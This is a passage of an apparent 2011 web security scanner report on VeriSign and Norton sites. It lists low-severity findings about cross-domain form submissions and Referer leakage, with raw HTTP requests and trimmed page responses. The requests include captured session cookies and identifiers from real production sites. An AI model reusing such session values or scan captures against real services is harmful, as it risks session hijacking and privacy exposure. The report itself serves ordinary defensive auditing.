GET /trust-seal/index.html?tid=gnps HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/corporate/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621625|session#1315621535113-743172#1315623425|PC#1315621455064-973488.19#1378693568; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.3.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 50059 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>VeriSign Trust Seal - Perfec...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]...
13.25. http://www.verisign.ch/trust-seal/index.html
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/trust-seal/index.html
Issue detail
The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields: order_number, application_locale
Request
GET /trust-seal/index.html?tid=gnps HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/corporate/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621625|session#1315621535113-743172#1315623425|PC#1315621455064-973488.19#1378693568; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.3.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 50059 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>VeriSign Trust Seal - Perfec...[SNIP]... </h4> <form method="post" action="https://securitycenter.verisign.com/celp/enroll/orderStatus" id="myacc_search" target="_top"> <fieldset id="myacc_fieldset">...[SNIP]...
14. Cross-domain Referer leakage
There are 70 instances of this issue:
Issue background
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form. If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise. You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application. Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure. Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
14.1. http://blogs.verisign.com/
Summary
Severity:
Information
Confidence:
Certain
Host:
http://blogs.verisign.com
Path:
/
Issue detail
The page was loaded from a URL containing a query string:
http://blogs.verisign.com/?tid=footer
The response contains the following links to other domains:
http://feeds.feedburner.com/WebUserExperienceBlog
http://www.symantec.com/
http://www.symantec.com/connect/blogs/authentication-business
http://www.symantec.com/connect/blogs/authentication-user
http://www.symantec.com/connect/item-feeds/blog/691,29651/feed/all/all
http://www.symantec.com/connect/item-feeds/blog/691,29681/feed/all/all
http://www.verisign.be/
http://www.verisign.ch/
http://www.verisign.de/
http://www.verisign.dk/
http://www.verisign.es/
http://www.verisign.fr/
http://www.verisign.in/
http://www.verisign.it/
http://www.verisign.se/
http://www.verisignchina.com.cn/
https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
Request
GET /?tid=footer HTTP/1.1 Host: blogs.verisign.com Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache Last-Modified: Wed, 11 May 2011 20:19:01 GMT ETag: "1a606f6-9f7a-c8827740" Accept-Ranges: bytes Content-Length: 40826 Content-Type: text/html; charset=UTF-8 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=7" /> <...[SNIP]... <li><a href="http://www.verisign.be/"> Belgium</a>...[SNIP]... <li><a href="http://www.verisignchina.com.cn/"> China</a>...[SNIP]... <li><a href="http://www.verisign.dk/"> Denmark</a>...[SNIP]... <li><a href="http://www.verisign.fr/"> France</a>...[SNIP]... <li><a href="http://www.verisign.de/"> Germany</a>...[SNIP]... <li><a href="http://www.verisign.in/"> India</a>...[SNIP]... <li><a href="http://www.verisign.it/"> Italy</a>...[SNIP]... <li><a href="http://www.verisign.es/"> Spain</a>...[SNIP]... <li><a href="http://www.verisign.se/"> Sweden</a>...[SNIP]... <li><a href="http://www.verisign.ch/"> Switzerland</a>...[SNIP]... <noscript> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" id="s_s" align="" height="72" width="100"> <param name="movie" value="https://seal.verisign.com/getseal?at=1&sealid=2&dn=www.verisign.com&lang=en">...[SNIP]... <li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do"> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]... <p class="title"><a href="http://www.symantec.com/connect/blogs/authentication-user" class="blueContentTitle"> User Authentication Blog</a>...[SNIP]... 
<div class="images"> <a href="http://www.symantec.com/connect/blogs/authentication-user"> <img src="//www.verisign.com/images/symc-blogs.jpg" alt="User Authentication Blog" /></a> <a href="http://www.symantec.com/connect/item-feeds/blog/691,29681/feed/all/all"> <img src="//www.verisign.com/images/rssIcon.gif" class="rssIcon" alt="RSS" />...[SNIP]... <p class="title"><a href="http://www.symantec.com/connect/blogs/authentication-business" class="blueContentTitle"> Business Authentication Blog</a>...[SNIP]... <div class="images"> <a href="http://www.symantec.com/connect/blogs/authentication-business"> <img src="//www.verisign.com/images/symc-blogs.jpg" alt="Business Authentication Blog" /></a> <a href="http://www.symantec.com/connect/item-feeds/blog/691,29651/feed/all/all"> <img src="//www.verisign.com/images/rssIcon.gif" class="rssIcon" alt="RSS" />...[SNIP]... </a> <a href="http://feeds.feedburner.com/WebUserExperienceBlog"> <img src="//www.verisign.com/images/rssIcon.gif" class="rssIcon" alt="RSS" />...[SNIP]... <p>VeriSign Authentication Services, now part of <a href="http://www.symantec.com" rel="external"> Symantec Corp.</a>...[SNIP]...
14.2. http://buy.norton.com/estore/mf/landingProductFeatures
Summary
Severity:
Information
Confidence:
Certain
Host:
http://buy.norton.com
Path:
/estore/mf/landingProductFeatures
Issue detail
The page was loaded from a URL containing a query string:
http://buy.norton.com/estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508
The response contains the following links to other domains:
http://store.symantec.com/?inid=us_estore
http://www.mynortonaccount.com/
http://www.symantec.com/about
http://www.symantec.com/about/profile/policies/eulas
http://www.symantec.com/about/profile/policies/legal.jsp
http://www.symantec.com/about/profile/policies/privacy.jsp
http://www.symantec.com/business
http://www.symantec.com/feedback/
http://www.symantec.com/home_homeoffice/support/special/upgrade2007/
http://www.symantec.com/norton
http://www.symantec.com/norton/downloads/index.jsp
http://www.symantec.com/partners
https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=buy.norton.com&lang=en
https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN
Request
GET /estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508 HTTP/1.1 Host: buy.norton.com Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mbox=check#true#1315621948|session#1315621887128-280442#1315623748|PC#1315621887128-280442.19#1316831490; s_pers=%20s_nr%3D1315621900063-New%7C1336357900063%3B%20event69%3Devent69%7C1336357900064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D760290967935%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621902268; JSESSIONID=LyytTqFG2snPQBSzMGKlyR2Ll6W2nTt9yvvmMtQHvQcdVXB18rCT!-50551110; COUNTRY=US; LANGUAGE=en; PROGRAMID_CREATED_DATE=09-09-2011; PROGRAMID=; PROGRAM_TYPE=UNKNOWN; FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; LASTTIME_CV_DATE=Sep-09-2011 14:31:16; TrafficSourceCookieName=trf_id:symcom; OriginalSubChannelCookieName=Online (1st); CurrentSubChannelCookieName=Online (1st); BIGipServerbuy1_prd_SSL=4046749583.16671.0000
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Cache-Control: no-cache="set-cookie" Date: Fri, 09 Sep 2011 21:31:18 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 55880 Connection: Keep-Alive <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js i...[SNIP]... <div id="globalNavMainInner1"> <a href="http://www.symantec.com/norton"> Norton</a>...[SNIP]... <div id="globalNavMainInner2"> <a href="http://www.symantec.com/business"> Business</a>...[SNIP]... <div id="globalNavMainInner3"> <a href="http://www.symantec.com/partners"> Partners</a>...[SNIP]... <div id="globalNavMainInner5"> <a href="http://www.symantec.com/about"> About Symantec</a>...[SNIP]... <div class="lftNavMainNav"> <a href="http://www.symantec.com/norton/downloads/index.jsp" title="" class="lftNavArrowMargin"> <span>...[SNIP]... <div class="lftNavMainNav"> <a title="" class=" lftNavArrowMargin" href="https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN"> Find My Order </a>...[SNIP]... <li> <a target="_parent" href="http://www.symantec.com/home_homeoffice/support/special/upgrade2007/"> Norton Update Center</a>...[SNIP]... <div class="verisign"> <a target="_blank" title="" href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=buy.norton.com&lang=en"> <img title="Verisign" src="//buy-static.norton.com/estore/images//en/Non-Product/Logo/partner_logo/logo_verisign.png">...[SNIP]... 
<div class=" medBusinessUpgrade positioning "> <a href="http://store.symantec.com/?inid=us_estore"> <img width="718" height="75" src="//buy-static.norton.com/estore/images/en/Non-Product/Ad_Objects/bnr_smb_protectyourbiz_718.png">...[SNIP]... <span><a target="_blank" href="http://www.symantec.com/about/profile/policies/legal.jsp"> Legal Notices</a>...[SNIP]... <span><a target="_blank" href="http://www.symantec.com/about/profile/policies/privacy.jsp"> Privacy Policy</a>...[SNIP]... <span><a target="_blank" href="http://www.myNortonAccount.com "> Norton Account</a>...[SNIP]... <span><a target="_blank" href="http://www.symantec.com/about/profile/policies/eulas"> License Agreements </a>...[SNIP]... <span id="item4" class="footerItemBorder"><a target="_blank" href="http://www.symantec.com/feedback/"> Contact Us</a>...[SNIP]...
14.3. http://buy.norton.com/estore/mf/upgradeRenewal
Summary
Severity: Information
Confidence: Certain
Host: http://buy.norton.com
Path: /estore/mf/upgradeRenewal
Issue detail
The page was loaded from a URL containing a query string:
http://buy.norton.com/estore/mf/upgradeRenewal?rdid=2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199
The response contains the following links to other domains:
http://www.mynortonaccount.com/
http://www.symantec.com/about
http://www.symantec.com/about/profile/policies/eulas
http://www.symantec.com/about/profile/policies/legal.jsp
http://www.symantec.com/about/profile/policies/privacy.jsp
http://www.symantec.com/business
http://www.symantec.com/feedback/
http://www.symantec.com/home_homeoffice/support/special/upgrade2007/
http://www.symantec.com/norton
http://www.symantec.com/norton/downloads/index.jsp
http://www.symantec.com/norton/support/kb/web_view.jsp?wv_type=public_web&docurl=20080417101717EN
http://www.symantec.com/partners
https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_estore
https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN
Request
GET /estore/mf/upgradeRenewal?rdid=2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199 HTTP/1.1
Host: buy.norton.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1315621900063-New%7C1336357900063%3B%20event69%3Devent69%7C1336357900064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D760290967935%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621902268; JSESSIONID=LyytTqFG2snPQBSzMGKlyR2Ll6W2nTt9yvvmMtQHvQcdVXB18rCT!-50551110; FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; BIGipServerbuy1_prd_SSL=4046749583.16671.0000; symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; AKNORT=0; mbox=check#true#1315621970|session#1315621887128-280442#1315623770|PC#1315621887128-280442.19#1316831510|profile#+_COUNTRY-US+_LANGUAGE-en+_TRAFFIC_SOURCE-trf_id%3Asymcom+_PGM_TYPE-UNKNOWN+_SUBCHANNEL-Online%20%281st%29+_ORIG_SUB-Online%20%281st%29#1380421910; s_eVar63=%5B%5B'store%253Atrf_id%253Asymcom'%2C'1315621909811'%5D%5D; s_eVar65=%5B%5B'store%253Aonline%2520%25281st%2529'%2C'1315621909812'%5D%5D; s_cc=true; s_nr=1315621909816-New; event69=event69; s_eVar70=%5B%5B'23440%253A0%253A0%252C'%2C'1315621909824'%5D%5D; s_sq=%5B%5BB%5D%5D; COUNTRY=US; LANGUAGE=EN; PROGRAMID_CREATED_DATE=09-09-2011; PROGRAMID=; PROGRAM_TYPE=UNKNOWN; LASTTIME_CV_DATE=Sep-09-2011 14:31:20; TrafficSourceCookieName=trf_id:symcom; OriginalSubChannelCookieName=Online (1st); CurrentSubChannelCookieName=Online (1st)
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Cache-Control: no-cache="set-cookie" Date: Fri, 09 Sep 2011 21:31:22 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 58568 Connection: Keep-Alive <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]... <div id="globalNavMainInner1"> <a href="http://www.symantec.com/norton"> Norton</a>...[SNIP]... <div id="globalNavMainInner2"> <a href="http://www.symantec.com/business"> Business</a>...[SNIP]... <div id="globalNavMainInner3"> <a href="http://www.symantec.com/partners"> Partners</a>...[SNIP]... <div id="globalNavMainInner5"> <a href="http://www.symantec.com/about"> About Symantec</a>...[SNIP]... <div class="lftNavMainNav"> <a href="http://www.symantec.com/norton/downloads/index.jsp" title="" class="lftNavArrowMargin"> <span>...[SNIP]... <div class="lftNavMainNav"> <a title="" class=" lftNavArrowMargin" href="https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN"> Find My Order </a>...[SNIP]... <li> <a target="_parent" href="http://www.symantec.com/home_homeoffice/support/special/upgrade2007/"> Norton Update Center</a>...[SNIP]... 
<div class="lwrTopLfPnl_link"> <a onclick="var w = window.open(href, '', 'scrollbars=yes,location=no,menuBar=no,resizable=no,status=no,toolbar=no,width=850,height=550,left=200,top=200'); if(w.blur) w.focus(); return false;" title="" href="http://www.symantec.com/norton/support/kb/web_view.jsp?wv_type=public_web&docurl=20080417101717EN"> How do I find my version?</a>...[SNIP]... <div class="smallBusinessUpgrade positioning"> <a href="https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_estore"> <img width="305" height="75" src="//buy-static.norton.com/estore/images/en/Non-Product/Ad_Objects/bnr_smb_renew_now_305.png"/>...[SNIP]... <span><a target="_blank" href="http://www.symantec.com/about/profile/policies/legal.jsp"> Legal Notices</a>...[SNIP]... <span><a target="_blank" href="http://www.symantec.com/about/profile/policies/privacy.jsp"> Privacy Policy</a>...[SNIP]... <span><a target="_blank" href="http://www.myNortonAccount.com "> Norton Account</a>...[SNIP]... <span><a target="_blank" href="http://www.symantec.com/about/profile/policies/eulas"> License Agreements </a>...[SNIP]... <span id="item4" class="footerItemBorder"><a target="_blank" href="http://www.symantec.com/feedback/"> Contact Us</a>...[SNIP]...
14.4. http://community.norton.com/norton/
Summary
Severity: Information
Confidence: Certain
Host: http://community.norton.com
Path: /norton/
Issue detail
The page was loaded from a URL containing a query string:
http://community.norton.com/norton/?category.id=nis
The response contains the following links to other domains:
http://connect.facebook.net/en_US/all.js
http://norton.i.lithium.com/i/rank_icons/admin.gif
http://norton.i.lithium.com/skins/HEAD/C105409C876B69B68E91EDA257001258/nortonen1446997136.css
http://norton.i.lithium.com/skins/images/36DAF0C87B7C6C4940B22274E6384D9C/base/images/button_lithium_logo.png
http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png
http://norton.i.lithium.com/skins/images/BB41541B9291E6F322D353043685E371/base/images/button_fbconnect_secondary.png
http://norton.i.lithium.com/skins/images/C0E5B9B4C7EE14DAAFFEA36D02AE9AF5/base/images/icon_help.png
http://norton.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js
http://norton.i.lithium.com/t5/scripts/77C9F3D724AC1AE6812CFEF77A811FB9/lia-scripts-body-min.js
http://norton.i.lithium.com/t5/scripts/DA34F51B38ECCEA28CC9A83474C0A92F/lia-scripts-common-min.js
http://twitter.com/nortonforumsUSA
http://twitter.com/nortononline
http://www.facebook.com/Norton
http://www.lithium.com/
http://www.symantec.com/content/en/us/home_homeoffice/images/misc/icon_facebook_16.gif
http://www.symantec.com/content/en/us/home_homeoffice/images/misc/icon_twitter_16.gif
http://www.symantec.com/content/en/us/home_homeoffice/images/misc/icon_youtube_16.gif
http://www.symantec.com/favicon.ico
http://www.symantec.com/lib/jsp/headerjs.jsp?lg=en&ct=us&sg=norton&url=/norton/index.jsp&domain=www.symantec.com&analytics=n
http://www.symantec.com/script/omniture/om_code.js
http://www.symantec.com/script/omniture/s_code.js
http://www.youtube.com/Norton
Request
GET /norton/?category.id=nis HTTP/1.1
Host: community.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:41:45 GMT Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, private Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 61789 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head> <link class="lia-link...[SNIP]... </link> <link href="http://norton.i.lithium.com/skins/HEAD/C105409C876B69B68E91EDA257001258/nortonen1446997136.css" rel="stylesheet" type="text/css"> </link> <link rel="shortcut icon" href="http://www.symantec.com/favicon.ico" type="image/x-icon" /> <meta name="om.environment" content="prod" />...[SNIP]... <![endif]--><script language="javascript" type="text/javascript" src="http://www.symantec.com/lib/jsp/headerjs.jsp?lg=en&ct=us&sg=norton&url=/norton/index.jsp&domain=www.symantec.com&analytics=n"> </script><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"> </script>...[SNIP]... <a class="lia-link-navigation help-icon lia-tooltip-trigger" id="link_37" href="#"><img class="" id="display" src="http://norton.i.lithium.com/skins/images/C0E5B9B4C7EE14DAAFFEA36D02AE9AF5/base/images/icon_help.png"/> </a>...[SNIP]... <a class="lia-link-navigation lia-button-facebook" id="lithiumFacebookConnectIcon" href="/t5/Norton-Users-Discussion-Forum/ct-p/nis?category.id=nis"><img class="" id="display_0" src="http://norton.i.lithium.com/skins/images/BB41541B9291E6F322D353043685E371/base/images/button_fbconnect_secondary.png"/> </a>...[SNIP]... 
<a class="lia-link-navigation board-icon" id="link_43" href="/t5/Announcements/bd-p/Announcements"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_1" src="http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png"/> </a>...[SNIP]... <a class="lia-link-navigation board-icon" id="link_46" href="/t5/Norton-Internet-Security-Norton/bd-p/nis_feedback"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_2" src="http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png"/> </a>...[SNIP]... <a class="lia-link-navigation board-icon" id="link_49" href="/t5/Norton-360/bd-p/Norton_360"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_3" src="http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png"/> </a>...[SNIP]... <a class="lia-link-navigation board-icon" id="link_52" href="/t5/Norton-Online-Family/bd-p/OnlineFamily"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_4" src="http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png"/> </a>...[SNIP]... <a class="lia-link-navigation board-icon" id="link_55" href="/t5/Norton-for-Mac/bd-p/norton_mac"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_5" src="http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png"/> </a>...[SNIP]... 
<a class="lia-link-navigation board-icon" id="link_58" href="/t5/Norton-Online-Backup/bd-p/NOBU_forum"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_6" src="http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png"/> </a>...[SNIP]... <a class="lia-link-navigation board-icon" id="link_61" href="/t5/Other-Norton-Products/bd-p/other"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_7" src="http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png"/> </a>...[SNIP]... <a class="lia-link-navigation board-icon" id="link_64" href="/t5/Forum-Feedback/bd-p/forum_feedback"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_8" src="http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png"/> </a>...[SNIP]... <a class="lia-link-navigation board-icon" id="link_67" href="/t5/Product-Suggestions/bd-p/Suggestions"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_9" src="http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png"/> </a>...[SNIP]... <div style="margin-bottom: 10px; margin-top: 5px;"><a target="_blank" href="http://www.facebook.com/Norton"> <img height="16" width="16" style="vertical-align: middle;" alt="Norton on Facebook" src="http://www.symantec.com/content/en/us/home_homeoffice/images/misc/icon_facebook_16.gif"/> </a> <a target="_blank" href="http://www.facebook.com/Norton"> Be a fan on Facebook</a>...[SNIP]... 
<div style="margin-bottom: 10px;"><a target="_blank" href="http://www.youtube.com/Norton"> <img height="16" width="16" style="vertical-align: middle;" alt="Subscribe on YouTube" src="http://www.symantec.com/content/en/us/home_homeoffice/images/misc/icon_youtube_16.gif"/> </a> <a target="_blank" href="http://www.youtube.com/Norton"> Subscribe on YouTube</a>...[SNIP]... <div style="margin-bottom: 10px;"><a target="_blank" href="http://twitter.com/nortononline"> <img height="16" width="16" style="vertical-align: middle;" alt="Follow us on Twitter" src="http://www.symantec.com/content/en/us/home_homeoffice/images/misc/icon_twitter_16.gif"/> </a> <a target="_blank" href="http://twitter.com/nortonforumsUSA"> Follow us on Twitter</a>...[SNIP]... <a target="_blank" href="http://de.community.norton.com"><img height="16" width="16" style="vertical-align: middle;" alt="Deutsches Norton Forum" src="http://www.symantec.com/favicon.ico"/> </a>...[SNIP]... <a target="_blank" href="http://fr.community.norton.com"><img height="16" width="16" style="vertical-align: middle;" alt="Communaut.. Norton" src="http://www.symantec.com/favicon.ico"/> </a>...[SNIP]... <a target="_blank" href="http://communityjp.norton.com"><img height="16" width="16" style="vertical-align: middle;" alt="................................." src="http://www.symantec.com/favicon.ico"/> </a>...[SNIP]... <a target="_blank" href="http://bbs.norton.com"><img height="16" width="16" style="vertical-align: middle;" alt=".................." src="http://www.symantec.com/favicon.ico"/> </a>...[SNIP]... <span class="UserName lia-user-name"> <img class="lia-user-rank-icon-left" title="Administrator" alt="Administrator" id="display_11" src="http://norton.i.lithium.com/i/rank_icons/admin.gif"/> <a class="lia-link-navigation lia-page-link lia-user-name-link" style="color:#FF0000" target="_self" id="link_72" href="/t5/user/viewprofilepage/user-id/17">...[SNIP]... 
